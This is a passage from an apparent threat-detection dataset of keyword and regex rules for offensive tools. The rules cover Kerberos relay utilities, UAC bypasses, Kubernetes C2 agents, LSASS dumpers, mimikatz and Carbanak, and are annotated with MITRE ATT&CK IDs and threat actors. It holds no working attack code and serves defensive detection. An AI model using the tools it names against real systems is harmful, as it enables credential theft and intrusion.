tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50604" "*KrbRelay.exe *",".{0,1000}KrbRelay\.exe\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50605" "*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50606" "*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50607" "*KrbRelay.sln*",".{0,1000}KrbRelay\.sln.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50608" "*KrbRelayUp - Relaying you to SYSTEM*",".{0,1000}KrbRelayUp\s\-\sRelaying\syou\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50609" "*KrbRelayUp.csproj*",".{0,1000}KrbRelayUp\.csproj.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50610" "*KrbRelayUp.DSInternals.Common.Properties*",".{0,1000}KrbRelayUp\.DSInternals\.Common\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50611" "*KrbRelayUp.exe *",".{0,1000}KrbRelayUp\.exe\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50612" "*KrbRelayUp.exe *",".{0,1000}KrbRelayUp\.exe\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50613" "*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local 
privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50614" "*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50615" "*KrbRelayUp.lib*",".{0,1000}KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50616" "*KrbRelayUp/1.0*",".{0,1000}KrbRelayUp\/1\.0.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","#useragent","user-agent","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50617" "*krbrelayx*",".{0,1000}krbrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50618" "*krbrelayx.git*",".{0,1000}krbrelayx\.git.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50619" "*krbrelayx.py -*",".{0,1000}krbrelayx\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50620" "*krbrelayx.py*",".{0,1000}krbrelayx\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50621" 
"*krbrelayx-master*",".{0,1000}krbrelayx\-master.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","50622" "*krbroast-pcap2hashcat.py*",".{0,1000}krbroast\-pcap2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50623" "*KRBSCM: Will use the currently loaded Kerberos Service Ticket to create a new service running as SYSTEM*",".{0,1000}KRBSCM\:\sWill\suse\sthe\scurrently\sloaded\sKerberos\sService\sTicket\sto\screate\sa\snew\sservice\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50624" "*krbtgt_password_age(self)*",".{0,1000}krbtgt_password_age\(self\).{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","50625" "*KRBUACBypass 1*",".{0,1000}KRBUACBypass\s1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50626" "*KRBUACBypass.csproj*",".{0,1000}KRBUACBypass\.csproj.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50627" "*KRBUACBypass.exe*",".{0,1000}KRBUACBypass\.exe.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50628" "*KRBUACBypass.sln*",".{0,1000}KRBUACBypass\.sln.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50629" 
"*KRBUACBypass/tarball*",".{0,1000}KRBUACBypass\/tarball.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50630" "*KRBUACBypass/zipball*",".{0,1000}KRBUACBypass\/zipball.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50631" "*Krueger.SiPolicy.p7b*",".{0,1000}Krueger\.SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","50632" "*kstowell@codejockeys.com*",".{0,1000}kstowell\@codejockeys\.com.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","#email","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","50633" "*ktsuss-lpe.sh*",".{0,1000}ktsuss\-lpe\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","50634" "*kubeletAttack.json*",".{0,1000}kubeletAttack\.json.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50635" "*Kubesploit Agent*",".{0,1000}Kubesploit\sAgent.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50636" "*kubesploitAgent-Darwin*",".{0,1000}kubesploitAgent\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50637" "*kubesploitAgent-Linux*",".{0,1000}kubesploitAgent\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50638" 
"*kubesploit-main*",".{0,1000}kubesploit\-main.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50639" "*kubesploitServer-Darwin*",".{0,1000}kubesploitServer\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50640" "*kubesploitServer-Linux*",".{0,1000}kubesploitServer\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","#linux","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","50641" "*kubestroyer -t *",".{0,1000}kubestroyer\s\-t\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50642" "*Kubestroyer@latest*",".{0,1000}Kubestroyer\@latest.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes 
pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50643" "*kubestroyer_linux_x64*",".{0,1000}kubestroyer_linux_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","#linux","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50644" "*kubestroyer_macos_arm64*",".{0,1000}kubestroyer_macos_arm64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50645" "*kubestroyer_macos_x64*",".{0,1000}kubestroyer_macos_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50646" "*kubestroyer_windows_x64*",".{0,1000}kubestroyer_windows_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50647" "*Kubestroyer-master*",".{0,1000}Kubestroyer\-master.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","50648" "*Kudaes/Dumpy*",".{0,1000}Kudaes\/Dumpy.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","1","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","50649" "*Kudaes/Elevator*",".{0,1000}Kudaes\/Elevator.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","50650" "*kuhl_m_dpapi_chrome.c*",".{0,1000}kuhl_m_dpapi_chrome\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50651" "*kuhl_m_lsadump.c*",".{0,1000}kuhl_m_lsadump\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - 
T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50652" "*kuhl_m_lsadump_getComputerAndSyskey*",".{0,1000}kuhl_m_lsadump_getComputerAndSyskey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50653" "*kuhl_m_lsadump_getUsersAndSamKey*",".{0,1000}kuhl_m_lsadump_getUsersAndSamKey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - 
APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50654" "*kuhl_m_sekurlsa_msv_pth_makefakestring*",".{0,1000}kuhl_m_sekurlsa_msv_pth_makefakestring.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","50655" "*kuhl_m_sekurlsa_nt6.c*",".{0,1000}kuhl_m_sekurlsa_nt6\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
